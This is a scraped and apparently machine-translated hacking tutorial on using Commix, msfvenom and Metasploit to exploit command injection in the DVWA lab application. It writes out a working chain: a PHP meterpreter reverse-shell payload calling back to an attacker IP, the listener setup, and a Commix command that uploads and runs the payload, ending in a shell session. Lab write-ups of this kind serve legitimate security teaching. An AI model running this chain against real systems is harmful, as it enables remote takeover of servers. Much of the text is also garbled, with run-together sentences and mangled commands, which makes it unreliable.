قالب وردپرس درنا توس
Home / Tips and Tricks / Using Commix to Automate Command Injection Error in Web Applications «Null Byte :: WonderHowTo

Using Commix to Automate Command Injection Error in Web Applications «Null Byte :: WonderHowTo



The ability to execute system commands through a vulnerable Web application makes command injection a fertile attack vector for any hacker. Although these types of vulnerabilities are highly appreciated, it can often take a while to search an entire application to find those errors. Fortunately, there is a useful tool called Commix that can automate this process for us.

What Is Commix

Commix, a portmanteau of Command Injection Exploiter, is an open-source tool used to test web-based application injection-based vulnerabilities and errors. It is automated which makes it very easy to identify vulnerable parameters in a fraction of the time required for manual execution.

Commix is ​​written in Python, which means that it can run on Linux, Mac and Windows. In addition, it is also included in the official repositories of Kali Linux, BlackArch and Parrot Security OS. Everything works immediately and there is even support for custom module development to extend the core functionality of this tool.

A variety of options are available, including the ability to specify connection parameters to the host, target enumeration, file access and modification, and even an offline mode. All of these features make Commix a very useful tool when trying to exploit command injection.

In this tutorial we will use Commix and later msfvenom and Metasploit to exploit command injection errors in DVWA.

Method 1: Basic Usage

First open DVWA and sign in with the default credentials.

Next, navigate to DVWA Security and set the security level to low to ensure that this web application is exploited everything works smoothly.

Now, go to the Command Execution tab, which is of interest to Commix

You need the cookie that contains the session ID and security level for this tool to run successfully, use the Inspect Element tool in your browser to display the request, click " Network "and then" Raw headers "to view the information demonstrate.

Method 2: Upload Reverse Shell

Commix has a feature that allows us to write files to the system target system. We'll put a reverse shell on the target that calls our attack engine, but before we do that, we'll have to build the payload.

Msfvenom is a payload generator that replaces both msfpayload and msfencode back 2015. This single tool can be used to create payloads outside the Metasploit framework.

Use the command msfvenom with the following options.

  • The -p Flag indicating the payload.
  • Use lhost to specify the address of the Listening Host.
  • Use lport to set the listening port.
  • -D flag for specifying the encoder.
  • The -f flag for specifying the output format.

Make sure you type > to write to the file . payload.php .

  root @ drd: ~ # msfvenom -p php / meterpreter / reverse_tcp lhost = 172.16.1.100 lport = 4321 -e php / base64 -f raw> payload.php
[-] No platform was selected, with Msf :: Module :: Platform :: PHP selected from the payload
[-] No arc selected, with the payload arch: php selected
1 compatible encoder was found
Attempt to encode the payload with 1 iteration of PHP / Base64
php / base64 succeeded with size 1507 (iteration = 0)
php / base64 with final size 1507 selected
Payload size: 1507 bytes 

The payload was created successfully. Now all we have to do is put the PHP tags in our file. Enter nano payload.php and add <? Add php at the beginning of the file and [> at the end of the file. Press Ctrl-X Y and Enter to save.

Now we have to open a handler on our machine to intercept the session that is opened on the target. Start Metasploit in a new terminal window by typing msfconsole . After loading enter with Exploit / Multi / Handler the general purpose handler.

Next, set the payload, listening address, and port that we specified earlier in our file.

  msf exploit (multi / handler)> Payload PHP / meterpreter / reverse_tcp set
Payload => php / meterpreter / reverse_tcp
msf exploit (multi / handler)> set host 172.16.1.100
lhost => 172.16.1.100
Set msf exploit (multi / handler)> port 4321
lport => 4321 

Once these are set, start the handler by typing run an exploit alias.

  msf exploit (multi / handler)> run

[*] Reverse TCP handler was started at 172.16.1.100:4321[19659018Backinourotherterminalweareabletopre-commitsomeadditionaloptionstobringourpayloadtothetarget[1969090] The  - file-write  Option to specify the file to use on our local computer.  
  • The option - file-dest to set the destination on the target.
  • Option - os-cmd to specify the command to execute when the file is written to the destination.
  •   commix -u http://172.16.1.102/dvwa/vulnerabilities/exec/ - -cookie = & # 39; PHPSESSID = ba245268c2d2c08a209bf7db8bd004a0; security = low & # 39; - data = & # 39; ip = 127.0.0.1 & submit = submit & # 39; - file-write = & # 39; / root / payload.php & # 39; - file-dest = & # 39; / var / www / payload.php - os-cmd = & # 39; php -f /var/www/payload.php&#39;[19659018ThisallowsourpayloadtobeexecutedonasessionfromourhandlerifitworksproperlyCommixwillnotrunforawhileandfinallywecanfindthatourfilehasbeensuccessfullycreatedonthetarget

      ...
    
    [*] Testing the (result-based) classical instruction injection technique ... [ SUCCEED ]
    [+]   The POST parameter & # 39; ip & # 39; seems to be injectable via the (result-based) classical instruction injection technique.
    [~] Payload: Echo YJOSPV $ ((42 + 12)) $ (Echo YJOSPV) YJOSPV
    [+] The file /var/www/payload.php was created successfully! 

    Now you can see in the other terminal that a meterpreter session has actually been opened. We can now execute commands such as getuid and sysinfo to display information about the destination.

      [*] Send Stage (37775 bytes) to 172.16.1.102
    [*] Meterpreter Session 1 has been opened at 2018-10-18 11:29:19 -0500 (172.16.1.100:4321 -> 172.16.1.102:40115)
    
    meterpreter> getuid
    Server username: www-data (33)
    meterpreter> sysinfo
    Computer: metasploitable
    OS: Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
    Meterpreter: php / linux 

    These are similar results as before by using Commix alone, but now that we have a Meterpreter session, there is much more flexibility than we can ultimately do.

    Conclusion [19659003] Hackers attack command injection vulnerabilities due to the potential power they exert over the target system. Commix is ​​a very useful tool that automates the process of finding and exploiting these vulnerabilities and making life a little easier for the hacker.

    In this guide, we learned about some basic usage options. We also saw how you combine msfvenom with Commix to upload a payload to the target and get a shell. This flexibility makes Commix an excellent addition to any hacker arsenal.

    Don & # 39; t Miss: Use Metasploit's Web Delivery Script & Command Injection to invoke a shell

    Title image by Jarmoluk / Pixabay; Screenshots of drd_ / zero byte

    Source link